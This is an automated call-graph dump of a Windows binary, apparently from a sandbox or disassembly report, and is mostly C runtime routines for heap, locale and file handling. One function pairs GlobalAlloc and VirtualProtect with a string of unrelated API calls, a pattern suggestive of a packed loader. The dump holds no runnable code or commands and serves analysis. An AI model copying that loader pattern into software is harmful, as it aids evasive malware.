9807->9808 9809 4134f1 9808->9809 9810 4079a1 ___endstdio 68 API calls 9809->9810 9811 4134f8 9810->9811 9812 4079a1 ___endstdio 68 API calls 9811->9812 9813 413500 9812->9813 9814 4079a1 ___endstdio 68 API calls 9813->9814 9815 413508 9814->9815 9816 4079a1 ___endstdio 68 API calls 9815->9816 9817 413510 9816->9817 9818 4079a1 ___endstdio 68 API calls 9817->9818 9819 413518 9818->9819 9820 4079a1 ___endstdio 68 API calls 9819->9820 9821 413520 9820->9821 9822 4079a1 ___endstdio 68 API calls 9821->9822 9823 413528 9822->9823 9824 4079a1 ___endstdio 68 API calls 9823->9824 9825 413530 9824->9825 9826 4079a1 ___endstdio 68 API calls 9825->9826 9827 413538 9826->9827 9828 4079a1 ___endstdio 68 API calls 9827->9828 9829 413540 9828->9829 9830 4079a1 ___endstdio 68 API calls 9829->9830 9831 41354b 9830->9831 9832 4079a1 ___endstdio 68 API calls 9831->9832 9833 413553 9832->9833 9834 4079a1 ___endstdio 68 API calls 9833->9834 9835 41355b 9834->9835 9836 4079a1 ___endstdio 68 API calls 9835->9836 9837 413563 9836->9837 9838 4079a1 ___endstdio 68 API calls 9837->9838 9839 41356b 9838->9839 9840 4079a1 ___endstdio 68 API calls 9839->9840 9841 413573 9840->9841 9842 4079a1 ___endstdio 68 API calls 9841->9842 9843 41357b 9842->9843 9844 4079a1 ___endstdio 68 API calls 9843->9844 9845 413583 9844->9845 9846 4079a1 ___endstdio 68 API calls 9845->9846 9847 41358b 9846->9847 9848 4079a1 ___endstdio 68 API calls 9847->9848 9849 413593 9848->9849 9850 4079a1 ___endstdio 68 API calls 9849->9850 9851 41359b 9850->9851 9852 4079a1 ___endstdio 68 API calls 9851->9852 9853 4135a3 9852->9853 9854 4079a1 ___endstdio 68 API calls 9853->9854 9855 4135ab 9854->9855 9856 4079a1 ___endstdio 68 API calls 9855->9856 9857 4135b3 9856->9857 9858 4079a1 ___endstdio 68 API calls 9857->9858 9859 4135bb 9858->9859 9860 4079a1 ___endstdio 68 API calls 9859->9860 9861 4135c3 9860->9861 9862 4079a1 ___endstdio 68 API calls 9861->9862 9863 4135d1 9862->9863 9864 4079a1 ___endstdio 68 API calls 9863->9864 9865 4135dc 9864->9865 9866 4079a1 ___endstdio 68 API calls 9865->9866 9867 4135e7 9866->9867 9868 4079a1 ___endstdio 68 API calls 9867->9868 9869 4135f2 9868->9869 9870 4079a1 ___endstdio 68 API calls 9869->9870 9871 4135fd 9870->9871 9872 4079a1 ___endstdio 68 API calls 9871->9872 9873 413608 9872->9873 9874 4079a1 ___endstdio 68 API calls 9873->9874 9875 413613 9874->9875 9876 4079a1 ___endstdio 68 API calls 9875->9876 9877 41361e 9876->9877 9878 4079a1 ___endstdio 68 API calls 9877->9878 9879 413629 9878->9879 9880 4079a1 ___endstdio 68 API calls 9879->9880 9881 413634 9880->9881 9882 4079a1 ___endstdio 68 API calls 9881->9882 9882->9797 9883->9726 9885 40ec46 9884->9885 9886 40eb94 _memset 9884->9886 9890 4077db __invoke_watson 5 API calls 9885->9890 9894 41346e 9886->9894 9892 40ecf1 9890->9892 9892->9685 9893 41326f ___crtLCMapStringA 103 API calls 9893->9885 9895 4089c3 _LocaleUpdate::_LocaleUpdate 78 API calls 9894->9895 9896 413481 9895->9896 9904 4132b4 9896->9904 9899 41326f 9900 4089c3 _LocaleUpdate::_LocaleUpdate 78 API calls 9899->9900 9901 413282 9900->9901 9970 412eca 9901->9970 9905 4132d5 GetStringTypeW 9904->9905 9906 413300 9904->9906 9907 4132f5 GetLastError 9905->9907 9908 4132ed 9905->9908 9906->9908 9909 4133e7 9906->9909 9907->9906 9910 413339 MultiByteToWideChar 9908->9910 9927 4133e1 9908->9927 9932 4170e0 GetLocaleInfoA 9909->9932 9917 413366 9910->9917 9910->9927 9912 4077db __invoke_watson 5 API calls 9914 40ec01 9912->9914 9914->9899 9915 413438 GetStringTypeA 9920 413453 9915->9920 9915->9927 9916 41337b _memset ___convertcp 9919 4133b4 MultiByteToWideChar 9916->9919 9916->9927 9917->9916 9921 4078d7 _malloc 68 API calls 9917->9921 9923 4133db 9919->9923 9924 4133ca GetStringTypeW 9919->9924 9925 4079a1 ___endstdio 68 API calls 9920->9925 9921->9916 9928 412eaa 9923->9928 9924->9923 9925->9927 9927->9912 9929 412ec7 9928->9929 9930 412eb6 9928->9930 9929->9927 9930->9929 9931 4079a1 ___endstdio 68 API calls 9930->9931 9931->9929 9933 417113 9932->9933 9935 41710e 9932->9935 9963 412e94 9933->9963 9936 4077db __invoke_watson 5 API calls 9935->9936 9937 41340b 9936->9937 9937->9915 9937->9927 9938 417129 9937->9938 9939 417169 GetCPInfo 9938->9939 9943 4171f3 9938->9943 9940 417180 9939->9940 9941 4171de MultiByteToWideChar 9939->9941 9940->9941 9944 417186 GetCPInfo 9940->9944 9941->9943 9947 417199 _strlen 9941->9947 9942 4077db __invoke_watson 5 API calls 9945 41342c 9942->9945 9943->9942 9944->9941 9946 417193 9944->9946 9945->9915 9945->9927 9946->9941 9946->9947 9948 4078d7 _malloc 68 API calls 9947->9948 9949 4171cb _memset ___convertcp 9947->9949 9948->9949 9949->9943 9950 417228 MultiByteToWideChar 9949->9950 9951 417240 9950->9951 9955 41725f 9950->9955 9953 417264 9951->9953 9954 417247 WideCharToMultiByte 9951->9954 9952 412eaa __freea 68 API calls 9952->9943 9956 417283 9953->9956 9957 41726f WideCharToMultiByte 9953->9957 9954->9955 9955->9952 9958 410529 __calloc_crt 68 API calls 9956->9958 9957->9955 9957->9956 9959 41728b 9958->9959 9959->9955 9960 417294 WideCharToMultiByte 9959->9960 9960->9955 9961 4172a6 9960->9961 9962 4079a1 ___endstdio 68 API calls 9961->9962 9962->9955 9966 415f45 9963->9966 9967 415f5e 9966->9967 9968 415d16 strtoxl 92 API calls 9967->9968 9969 412ea5 9968->9969 9969->9935 9971 412eeb LCMapStringW 9970->9971 9974 412f06 9970->9974 9972 412f0e GetLastError 9971->9972 9971->9974 9972->9974 9973 413104 9976 4170e0 ___ansicp 92 API calls 9973->9976 9974->9973 9975 412f60 9974->9975 9977 412f79 MultiByteToWideChar 9975->9977 9993 4130fb 9975->9993 9978 41312c 9976->9978 9980 412fa6 9977->9980 9977->9993 9982 413220 LCMapStringA 9978->9982 9983 413145 9978->9983 9978->9993 9979 4077db __invoke_watson 5 API calls 9981 40ec21 9979->9981 9988 4078d7 _malloc 68 API calls 9980->9988 9998 412fbf ___convertcp 9980->9998 9981->9893 9984 41317c 9982->9984 9985 417129 ___convertcp 75 API calls 9983->9985 9987 413247 9984->9987 9992 4079a1 ___endstdio 68 API calls 9984->9992 9989 413157 9985->9989 9986 412ff7 MultiByteToWideChar 9990 413010 LCMapStringW 9986->9990 9991 4130f2 9986->9991 9987->9993 9999 4079a1 ___endstdio 68 API calls 9987->9999 9988->9998 9989->9993 9994 413161 LCMapStringA 9989->9994 9990->9991 9996 413031 9990->9996 9995 412eaa __freea 68 API calls 9991->9995 9992->9987 9993->9979 9994->9984 10003 413183 9994->10003 9995->9993 9997 41303a 9996->9997 10002 413063 9996->10002 9997->9991 10000 41304c LCMapStringW 9997->10000 9998->9986 9998->9993 9999->9993 10000->9991 10001 4130b2 LCMapStringW 10004 4130ca WideCharToMultiByte 10001->10004 10005 4130ec 10001->10005 10007 41307e ___convertcp 10002->10007 10009 4078d7 _malloc 68 API calls 10002->10009 10006 4078d7 _malloc 68 API calls 10003->10006 10008 413194 _memset ___convertcp 10003->10008 10004->10005 10010 412eaa __freea 68 API calls 10005->10010 10006->10008 10007->9991 10007->10001 10008->9984 10011 4131d2 LCMapStringA 10008->10011 10009->10007 10010->9991 10013 4131f2 10011->10013 10014 4131ee 10011->10014 10015 417129 ___convertcp 75 API calls 10013->10015 10016 412eaa __freea 68 API calls 10014->10016 10015->10014 10016->9984 10017->9688 10019 40952b 10018->10019 10020 409ca5 __encode_pointer 7 API calls 10019->10020 10021 409543 10019->10021 10020->10019 10021->9188 10025 409c13 10022->10025 10024 409c5c 10024->9190 10026 409c1f _fprintf 10025->10026 10033 40cd0f 10026->10033 10032 409c40 _fprintf 10032->10024 10034 40db4d __lock 68 API calls 10033->10034 10035 409c24 10034->10035 10036 409b28 10035->10036 10037 409d20 __decode_pointer 6 API calls 10036->10037 10038 409b3c 10037->10038 10039 409d20 __decode_pointer 6 API calls 10038->10039 10040 409b4c 10039->10040 10041 409bcf 10040->10041 10056 4105c3 10040->10056 10053 409c49 10041->10053 10043 409bb6 10044 409ca5 __encode_pointer 7 API calls 10043->10044 10045 409bc4 10044->10045 10048 409ca5 __encode_pointer 7 API calls 10045->10048 10046 409b8e 10046->10041 10050 410575 __realloc_crt 74 API calls 10046->10050 10051 409ba4 10046->10051 10047 409b6a 10047->10043 10047->10046 10069 410575 10047->10069 10048->10041 10050->10051 10051->10041 10052 409ca5 __encode_pointer 7 API calls 10051->10052 10052->10043 10118 40cd18 10053->10118 10057 4105cf _fprintf 10056->10057 10058 4105fc 10057->10058 10059 4105df 10057->10059 10060 41063d HeapSize 10058->10060 10063 40db4d __lock 68 API calls 10058->10063 10061 407f57 __dosmaperr 68 API calls 10059->10061 10065 4105f4 _fprintf 10060->10065 10062 4105e4 10061->10062 10064 406d3e __strnicmp_l 6 API calls 10062->10064 10066 41060c ___sbh_find_block 10063->10066 10064->10065 10065->10047 10074 41065d 10066->10074 10071 41057e 10069->10071 10072 4105bd 10071->10072 10073 41059e Sleep 10071->10073 10078 415927 10071->10078 10072->10046 10073->10071 10077 40da73 LeaveCriticalSection 10074->10077 10076 410638 10076->10060 10076->10065 10077->10076 10079 415933 _fprintf 10078->10079 10080 415948 10079->10080 10081 41593a 10079->10081 10083 41595b 10080->10083 10084 41594f 10080->10084 10082 4078d7 _malloc 68 API calls 10081->10082 10105 415942 __dosmaperr _fprintf 10082->10105 10094 415acd 10083->10094 10112 415968 ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 10083->10112 10085 4079a1 ___endstdio 68 API calls 10084->10085 10085->10105 10086 415b00 10088 409c75 _malloc 6 API calls 10086->10088 10087 415ad2 HeapReAlloc 10087->10094 10087->10105 10090 415b06 10088->10090 10089 40db4d __lock 68 API calls 10089->10112 10092 407f57 __dosmaperr 68 API calls 10090->10092 10091 415b24 10095 407f57 __dosmaperr 68 API calls 10091->10095 10091->10105 10092->10105 10093 409c75 _malloc 6 API calls 10093->10094 10094->10086 10094->10087 10094->10091 10094->10093 10096 415b1a 10094->10096 10097 415b2d GetLastError 10095->10097 10099 407f57 __dosmaperr 68 API calls 10096->10099 10097->10105 10101 415a9b 10099->10101 10100 4159f3 HeapAlloc 10100->10112 10102 415aa0 GetLastError 10101->10102 10101->10105 10102->10105 10103 415a48 HeapReAlloc 10103->10112 10104 40e35f ___sbh_alloc_block 5 API calls 10104->10112 10105->10071 10106 415ab3 10106->10105 10108 407f57 __dosmaperr 68 API calls 10106->10108 10107 409c75 _malloc 6 API calls 10107->10112 10110 415ac0 10108->10110 10109 415a96 10111 407f57 __dosmaperr 68 API calls 10109->10111 10110->10097 10110->10105 10111->10101 10112->10086 10112->10089 10112->10100 10112->10103 10112->10104 10112->10105 10112->10106 10112->10107 10112->10109 10113 40dbb0 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 10112->10113 10114 415a6b 10112->10114 10113->10112 10117 40da73 LeaveCriticalSection 10114->10117 10116 415a72 10116->10112 10117->10116 10121 40da73 LeaveCriticalSection 10118->10121 10120 409c4e 10120->10032 10121->10120 10125 412df0 10122->10125 10126 4089c3 _LocaleUpdate::_LocaleUpdate 78 API calls 10125->10126 10127 412e03 10126->10127 10127->9195 10129 405a79 __EH_prolog __write_nolock 10128->10129 10130 405a83 GlobalAlloc VirtualProtect 10129->10130 10131 405ab8 GetLastError 10130->10131 10132 405aca GetProcessHandleCount 10131->10132 10133 40618d GetSystemDefaultLCID 10131->10133 10132->10133 10134 4061a8 10133->10134 10135 40619b 10133->10135 10136 406277 10134->10136 10137 4061b8 6 API calls 10134->10137 10135->10131 10135->10134 10138 406280 OleQueryCreateFromData WinHttpCloseHandle FoldStringW 10136->10138 10139 4062fd 10136->10139 10140 406218 10137->10140 10142 407447 _feof 68 API calls 10138->10142 10141 406350 10139->10141 10145 40632f GetLongPathNameA CreateMutexA 10139->10145 10174 40753f 10140->10174 10148 40635e SetConsoleCtrlHandler AddAtomW lstrcpynA SetFileShortNameW 10141->10148 10151 406395 10141->10151 10143 4062a9 10142->10143 10218 4072a3 10143->10218 10145->10139 10148->10141 10149 4062b0 10227 407187 10149->10227 10170 40573c 10151->10170 10152 406231 10190 40554c 10152->10190 10154 4063ab 10164 4063db GetFileType FindFirstChangeNotificationW 10154->10164 10166 4063f4 GetConsoleAliasW GetUserDefaultLangID 10154->10166 10167 40640d LoadLibraryA 10154->10167 10156 4062c6 10250 4059c4 10156->10250 10163 406257 10214 4058c7 10163->10214 10164->10154 10166->10154 10167->9199 10172 405749 __write_nolock 10170->10172 10171 405837 10171->10154 10172->10171 10173 40576b 13 API calls 10172->10173 10173->10172 10175 40756a 10174->10175 10176 40754f 10174->10176 10262 40747b 10175->10262 10178 407f57 __dosmaperr 68 API calls 10176->10178 10180 407554 10178->10180 10179 40757a 10182 40622b 10179->10182 10183 407f57 __dosmaperr 68 API calls 10179->10183 10181 406d3e __strnicmp_l 6 API calls 10180->10181 10181->10182 10184 407447 10182->10184 10183->10182 10185 40746b 10184->10185 10186 407456 10184->10186 10185->10152 10187 407f57 __dosmaperr 68 API calls 10186->10187 10188 40745b 10187->10188 10189 406d3e __strnicmp_l 6 API calls 10188->10189 10189->10185 10712 4068c0 10190->10712 10192 405563 10193 4072e8 10192->10193 10195 4072f4 __flsbuf _fprintf 10193->10195 10194 407308 10196 407f57 __dosmaperr 68 API calls 10194->10196 10195->10194 10198 407392 __flsbuf 10195->10198 10763 40c0f3 10195->10763 10197 40730d 10196->10197 10199 406d3e __strnicmp_l 6 API calls 10197->10199 10201 40b0f4 _flsall 69 API calls 10198->10201 10202 40731d _fprintf 10199->10202 10203 4073a2 __flsbuf 10201->10203 10202->10163 10769 40b191 10203->10769 10206 4073b5 __flsbuf _strlen 10776 40c56b 10206->10776 10208 4073e8 __flsbuf 10809 40b22d 10208->10809 10212 4073d5 __flsbuf 10212->10208 10788 40c407 10212->10788 10215 4058d1 10214->10215 10217 4058f1 ctype 10214->10217 10215->10217 10871 40550d 10215->10871 10217->10136 10219 4072b0 10218->10219 10220 4072cd 10218->10220 10222 407f57 __dosmaperr 68 API calls 10219->10222 10220->10219 10221 4072d4 10220->10221 10883 40c3b8 10221->10883 10224 4072b5 10222->10224 10225 406d3e __strnicmp_l 6 API calls 10224->10225 10226 4072c5 10225->10226 10226->10149 10228 407193 _fprintf 10227->10228 10229 4071a6 10228->10229 10231 4071d2 10228->10231 10230 407f57 __dosmaperr 68 API calls 10229->10230 10232 4071ab 10230->10232 10233 40b0b3 __lock_file 69 API calls 10231->10233 10234 406d3e __strnicmp_l 6 API calls 10232->10234 10235 4071db 10233->10235 10240 4071bb _fprintf 10234->10240 10236 40c0f3 __fileno 68 API calls 10235->10236 10249 407255 10235->10249 10244 4071eb 10236->10244 10238 40b191 __stbuf 68 API calls 10239 407267 10238->10239 10936 40b307 10239->10936 10240->10156 10243 40b22d __ftbuf 102 API calls 10246 407281 10243->10246 10245 407f57 __dosmaperr 68 API calls 10244->10245 10244->10249 10247 407245 10245->10247 10956 407299 10246->10956 10248 406d3e __strnicmp_l 6 API calls 10247->10248 10248->10249 10249->10238 10249->10246 10251 4059ce __EH_prolog 10250->10251 10962 40596d 10251->10962 10254 405931 10255 405945 10254->10255 10257 405954 10255->10257 11008 406d64 10255->11008 10258 405a3c 10257->10258 10259 405a46 __EH_prolog 10258->10259 11011 405a12 10259->11011 10261 405a56 ctype 10261->10139 10264 407487 _fprintf 10262->10264 10263 40749a 10265 407f57 __dosmaperr 68 API calls 10263->10265 10264->10263 10267 4074cf 10264->10267 10266 40749f 10265->10266 10268 406d3e __strnicmp_l 6 API calls 10266->10268 10281 40c996 10267->10281 10279 4074af @_EH4_CallFilterFunc@8 _fprintf 10268->10279 10270 4074d4 10271 4074e8 10270->10271 10272 4074db 10270->10272 10274 40750f 10271->10274 10275 4074ef 10271->10275 10273 407f57 __dosmaperr 68 API calls 10272->10273 10273->10279 10299 40c6cd 10274->10299 10277 407f57 __dosmaperr 68 API calls 10275->10277 10277->10279 10279->10179 10282 40c9a2 _fprintf 10281->10282 10283 40db4d __lock 68 API calls 10282->10283 10284 40c9b0 10283->10284 10285 40ca2c 10284->10285 10291 40da8a __mtinitlocknum 68 API calls 10284->10291 10294 40ca25 10284->10294 10324 40b0f4 10284->10324 10329 40b162 10284->10329 10287 4104e4 __malloc_crt 68 API calls 10285->10287 10289 40ca36 10287->10289 10288 40caba _fprintf 10288->10270 10290 410e14 __mtinitlocknum InitializeCriticalSectionAndSpinCount 10289->10290 10289->10294 10293 40ca5b 10290->10293 10291->10284 10295 40ca66 10293->10295 10296 40ca79 EnterCriticalSection 10293->10296 10334 40cac5 10294->10334 10298 4079a1 ___endstdio 68 API calls 10295->10298 10296->10294 10298->10294 10301 40c6ef 10299->10301 10300 40c722 10305 40c935 10300->10305 10320 40c8df 10300->10320 10339 4128c9 10300->10339 10301->10300 10302 40c703 10301->10302 10303 407f57 __dosmaperr 68 API calls 10302->10303 10304 40c708 10303->10304 10307 406d3e __strnicmp_l 6 API calls 10304->10307 10308 407f57 __dosmaperr 68 API calls 10305->10308 10306 40c94f 10345 4124fa 10306->10345 10312 40751a 10307->10312 10310 40c93a 10308->10310 10311 406d3e __strnicmp_l 6 API calls 10310->10311 10311->10312 10321 407535 10312->10321 10317 412745 __fassign 103 API calls 10318 40c8f8 10317->10318 10319 412745 __fassign 103 API calls 10318->10319 10318->10320 10319->10320 10320->10305 10320->10306 10705 40b126 10321->10705 10323 40753d 10323->10279 10325 40b101 10324->10325 10326 40b117 EnterCriticalSection 10324->10326 10327 40db4d __lock 68 API calls 10325->10327 10326->10284 10328 40b10a 10327->10328 10328->10284 10330 40b172 10329->10330 10331 40b185 LeaveCriticalSection 10329->10331 10337 40da73 LeaveCriticalSection 10330->10337 10331->10284 10333 40b182 10333->10284 10338 40da73 LeaveCriticalSection 10334->10338 10336 40cacc 10336->10288 10337->10333 10338->10336 10348 41275f 10339->10348 10341 40c8aa 10341->10305 10342 412745 10341->10342 10361 41251a 10342->10361 10401 41242e 10345->10401 10347 412515 10347->10312 10349 412776 10348->10349 10360 41276f _strncmp 10348->10360 10350 4089c3 _LocaleUpdate::_LocaleUpdate 78 API calls 10349->10350 10351 412782 10350->10351 10352 4127e0 10351->10352 10353 4127b5 10351->10353 10351->10360 10355 407f57 __dosmaperr 68 API calls 10352->10355 10352->10360 10354 407f57 __dosmaperr 68 API calls 10353->10354 10356 4127ba 10354->10356 10357 4127ed 10355->10357 10358 406d3e __strnicmp_l 6 API calls 10356->10358 10359 406d3e __strnicmp_l 6 API calls 10357->10359 10358->10360 10359->10360 10360->10341 10362 4089c3 _LocaleUpdate::_LocaleUpdate 78 API calls 10361->10362 10363 41252e 10362->10363 10364 412550 10363->10364 10365 412576 10363->10365 10375 40c8d8 10363->10375 10376 417082 10364->10376 10367 4125a9 10365->10367 10368 41257b 10365->10368 10371 407f57 __dosmaperr 68 API calls 10367->10371 10367->10375 10369 407f57 __dosmaperr 68 API calls 10368->10369 10370 412580 10369->10370 10372 406d3e __strnicmp_l 6 API calls 10370->10372 10373 4125b6 10371->10373 10372->10375 10374 406d3e __strnicmp_l 6 API calls 10373->10374 10374->10375 10375->10317 10375->10320 10377 417092 10376->10377 10378 4170c4 10376->10378 10377->10378 10380 417097 10377->10380 10385 416f90 10378->10385 10381 407f57 __dosmaperr 68 API calls 10380->10381 10382 41709c 10381->10382 10383 406d3e __strnicmp_l 6 API calls 10382->10383 10384 4170ac 10383->10384 10384->10375 10386 416fa6 10385->10386 10397 416fcb ___ascii_strnicmp 10385->10397 10387 4089c3 _LocaleUpdate::_LocaleUpdate 78 API calls 10386->10387 10388 416fb1 10387->10388 10389 416fb6 10388->10389 10391 416feb 10388->10391 10390 407f57 __dosmaperr 68 API calls 10389->10390 10393 416fbb 10390->10393 10392 416ff5 10391->10392 10400 41701d 10391->10400 10394 407f57 __dosmaperr 68 API calls 10392->10394 10395 406d3e __strnicmp_l 6 API calls 10393->10395 10396 416ffa 10394->10396 10395->10397 10398 406d3e __strnicmp_l 6 API calls 10396->10398 10397->10384 10398->10397 10399 40f554 103 API calls __tolower_l 10399->10400 10400->10397 10400->10399 10403 41243a _fprintf 10401->10403 10402 41244d 10404 407f57 __dosmaperr 68 API calls 10402->10404 10403->10402 10406 41248b 10403->10406 10405 412452 10404->10405 10407 406d3e __strnicmp_l 6 API calls 10405->10407 10412 411d0f 10406->10412 10411 412461 _fprintf 10407->10411 10411->10347 10413 411d34 10412->10413 10472 416f57 10413->10472 10416 406c16 __invoke_watson 10 API calls 10421 411d5f 10416->10421 10417 411d98 10478 407f6a 10417->10478 10420 407f57 __dosmaperr 68 API calls 10422 411da7 10420->10422 10421->10417 10424 411e58 10421->10424 10423 406d3e __strnicmp_l 6 API calls 10422->10423 10451 411db6 10423->10451 10481 4161b5 10424->10481 10426 411efa 10427 411f01 10426->10427 10428 411f1b CreateFileA 10426->10428 10429 407f6a __dosmaperr 68 API calls 10427->10429 10430 411fb5 GetFileType 10428->10430 10431 411f48 10428->10431 10434 411f06 10429->10434 10432 411fc2 GetLastError 10430->10432 10433 412006 10430->10433 10435 411f81 GetLastError 10431->10435 10438 411f5c CreateFileA 10431->10438 10436 407f7d __dosmaperr 68 API calls 10432->10436 10504 415f70 10433->10504 10437 407f57 __dosmaperr 68 API calls 10434->10437 10499 407f7d 10435->10499 10440 411feb CloseHandle 10436->10440 10441 411f10 10437->10441 10438->10430 10438->10435 10440->10441 10442 411ff9 10440->10442 10445 407f57 __dosmaperr 68 API calls 10441->10445 10444 407f57 __dosmaperr 68 API calls 10442->10444 10444->10441 10445->10451 10446 412244 10449 4123b1 CloseHandle CreateFileA 10446->10449 10446->10451 10449->10451 10452 4123dc GetLastError 10449->10452 10468 4124cc 10451->10468 10453 407f7d __dosmaperr 68 API calls 10452->10453 10456 4123e8 10453->10456 10454 407f6a __dosmaperr 68 API calls 10462 41209a 10454->10462 10455 41634f 78 API calls __read_nolock 10455->10462 10594 415ff1 10456->10594 10458 416e26 70 API calls __lseek_nolock 10458->10462 10462->10446 10462->10455 10462->10458 10463 4122ac 10462->10463 10466 410fcd 70 API calls __lseeki64_nolock 10462->10466 10523 416cbd 10462->10523 10538 416b07 10462->10538 10569 411bea 10462->10569 10464 416cbd __close_nolock 71 API calls 10463->10464 10465 4122b3 10464->10465 10467 407f57 __dosmaperr 68 API calls 10465->10467 10466->10462 10467->10451 10469 4124d1 10468->10469 10470 4124f8 10468->10470 10704 41618e LeaveCriticalSection 10469->10704 10470->10411 10473 411d50 10472->10473 10474 416f66 10472->10474 10473->10416 10473->10421 10475 407f57 __dosmaperr 68 API calls 10474->10475 10476 416f6b 10475->10476 10477 406d3e __strnicmp_l 6 API calls 10476->10477 10477->10473 10479 409ef3 __getptd_noexit 68 API calls 10478->10479 10480 407f6f 10479->10480 10480->10420 10482 4161c1 _fprintf 10481->10482 10483 40da8a __mtinitlocknum 68 API calls 10482->10483 10484 4161d1 10483->10484 10485 40db4d __lock 68 API calls 10484->10485 10486 4161d6 _fprintf 10484->10486 10498 4161e5 10485->10498 10486->10426 10488 4162be 10489 410529 __calloc_crt 68 API calls 10488->10489 10492 4162c7 10489->10492 10490 40db4d __lock 68 API calls 10490->10498 10491 416266 EnterCriticalSection 10493 416276 LeaveCriticalSection 10491->10493 10491->10498 10497 416328 10492->10497 10606 4160ee 10492->10606 10493->10498 10495 410e14 __mtinitlocknum InitializeCriticalSectionAndSpinCount 10495->10498 10616 416346 10497->10616 10498->10488 10498->10490 10498->10491 10498->10495 10498->10497 10603 416288 10498->10603 10500 407f6a __dosmaperr 68 API calls 10499->10500 10501 407f88 __dosmaperr 10500->10501 10502 407f57 __dosmaperr 68 API calls 10501->10502 10503 407f9b 10502->10503 10503->10441 10505 415fd7 10504->10505 10506 415f7e 10504->10506 10507 407f57 __dosmaperr 68 API calls 10505->10507 10506->10505 10512 415fa2 10506->10512 10508 415fdc 10507->10508 10509 407f6a __dosmaperr 68 API calls 10508->10509 10510 412024 10509->10510 10510->10446 10510->10462 10513 416e26 10510->10513 10511 415fc7 SetStdHandle 10511->10510 10512->10510 10512->10511 10619 416077 10513->10619 10515 416e35 10516 416e4b SetFilePointer 10515->10516 10517 416e3b 10515->10517 10518 416e62 GetLastError 10516->10518 10519 416e6a 10516->10519 10520 407f57 __dosmaperr 68 API calls 10517->10520 10518->10519 10521 41208b 10519->10521 10522 407f7d __dosmaperr 68 API calls 10519->10522 10520->10521 10521->10454 10521->10462 10522->10521 10524 416077 __commit 68 API calls 10523->10524 10527 416ccd 10524->10527 10525 416d23 10526 415ff1 __free_osfhnd 69 API calls 10525->10526 10533 416d2b 10526->10533 10527->10525 10528 416077 __commit 68 API calls 10527->10528 10537 416d01 10527->10537 10530 416cf8 10528->10530 10529 416077 __commit 68 API calls 10531 416d0d CloseHandle 10529->10531 10534 416077 __commit 68 API calls 10530->10534 10531->10525 10535 416d19 GetLastError 10531->10535 10532 416d4d 10532->10462 10533->10532 10536 407f7d __dosmaperr 68 API calls 10533->10536 10534->10537 10535->10525 10536->10532 10537->10525 10537->10529 10632 410fcd 10538->10632 10541 416b89 10543 407f57 __dosmaperr 68 API calls 10541->10543 10544 416b94 10541->10544 10542 410fcd __lseeki64_nolock 70 API calls 10546 416b42 10542->10546 10543->10544 10544->10462 10545 416c24 10551 410fcd __lseeki64_nolock 70 API calls 10545->10551 10566 416c8d 10545->10566 10546->10541 10546->10545 10547 416b68 GetProcessHeap HeapAlloc 10546->10547 10548 416b84 10547->10548 10558 416b9b __setmode_nolock 10547->10558 10550 407f57 __dosmaperr 68 API calls 10548->10550 10549 410fcd __lseeki64_nolock 70 API calls 10549->10541 10550->10541 10552 416c3d 10551->10552 10552->10541 10553 416077 __commit 68 API calls 10552->10553 10554 416c53 SetEndOfFile 10553->10554 10555 416c70 10554->10555 10554->10566 10557 407f57 __dosmaperr 68 API calls 10555->10557 10559 416c75 10557->10559 10560 416c07 10558->10560 10563 416bde __setmode_nolock 10558->10563 10642 4114b7 10558->10642 10562 407f6a __dosmaperr 68 API calls 10559->10562 10561 407f6a __dosmaperr 68 API calls 10560->10561 10564 416c0c 10561->10564 10565 416c80 GetLastError 10562->10565 10567 416bec GetProcessHeap HeapFree 10563->10567 10564->10563 10568 407f57 __dosmaperr 68 API calls 10564->10568 10565->10566 10566->10541 10566->10549 10567->10566 10568->10563 10570 411bf6 _fprintf 10569->10570 10571 411c19 10570->10571 10572 411bfe 10570->10572 10573 411c27 10571->10573 10578 411c68 10571->10578 10574 407f6a __dosmaperr 68 API calls 10572->10574 10575 407f6a __dosmaperr 68 API calls 10573->10575 10576 411c03 10574->10576 10577 411c2c 10575->10577 10579 407f57 __dosmaperr 68 API calls 10576->10579 10580 407f57 __dosmaperr 68 API calls 10577->10580 10581 4160ee ___lock_fhandle 69 API calls 10578->10581 10589 411c0b _fprintf 10579->10589 10582 411c33 10580->10582 10583 411c6e 10581->10583 10584 406d3e __strnicmp_l 6 API calls 10582->10584 10585 411c91 10583->10585 10586 411c7b 10583->10586 10584->10589 10588 407f57 __dosmaperr 68 API calls 10585->10588 10587 4114b7 __write_nolock 100 API calls 10586->10587 10590 411c89 10587->10590 10591 411c96 10588->10591 10589->10462 10701 411cbc 10590->10701 10592 407f6a __dosmaperr 68 API calls 10591->10592 10592->10590 10595 416002 10594->10595 10596 41605d 10594->10596 10595->10596 10601 41602d 10595->10601 10597 407f57 __dosmaperr 68 API calls 10596->10597 10598 416062 10597->10598 10599 407f6a __dosmaperr 68 API calls 10598->10599 10600 416053 10599->10600 10600->10451 10601->10600 10602 41604d SetStdHandle 10601->10602 10602->10600 10604 40da73 _doexit LeaveCriticalSection 10603->10604 10605 41628f 10604->10605 10605->10498 10607 4160fa _fprintf 10606->10607 10608 416155 10607->10608 10611 40db4d __lock 68 API calls 10607->10611 10609 416177 _fprintf 10608->10609 10610 41615a EnterCriticalSection 10608->10610 10609->10497 10610->10609 10612 416126 10611->10612 10613 41613d 10612->10613 10615 410e14 __mtinitlocknum InitializeCriticalSectionAndSpinCount 10612->10615 10614 416185 ___lock_fhandle LeaveCriticalSection 10613->10614 10614->10608 10615->10613 10617 40da73 _doexit LeaveCriticalSection 10616->10617 10618 41634d 10617->10618 10618->10486 10620 416084 10619->10620 10621 41609c 10619->10621 10622 407f6a __dosmaperr 68 API calls 10620->10622 10623 407f6a __dosmaperr 68 API calls 10621->10623 10631 4160e1 10621->10631 10624 416089 10622->10624 10625 4160ca 10623->10625 10626 407f57 __dosmaperr 68 API calls 10624->10626 10627 407f57 __dosmaperr 68 API calls 10625->10627 10628 416091 10626->10628 10629 4160d1 10627->10629 10628->10515 10630 406d3e __strnicmp_l 6 API calls 10629->10630 10630->10631 10631->10515 10633 416077 __commit 68 API calls 10632->10633 10634 410feb 10633->10634 10635 410ff3 10634->10635 10636 411004 SetFilePointer 10634->10636 10637 407f57 __dosmaperr 68 API calls 10635->10637 10638 41101c GetLastError 10636->10638 10640 410ff8 10636->10640 10637->10640 10639 411026 10638->10639 10638->10640 10641 407f7d __dosmaperr 68 API calls 10639->10641 10640->10541 10640->10542 10641->10640 10643 4114c6 __write_nolock 10642->10643 10644 4114f8 10643->10644 10645 41151f 10643->10645 10674 4114ed 10643->10674 10647 407f6a 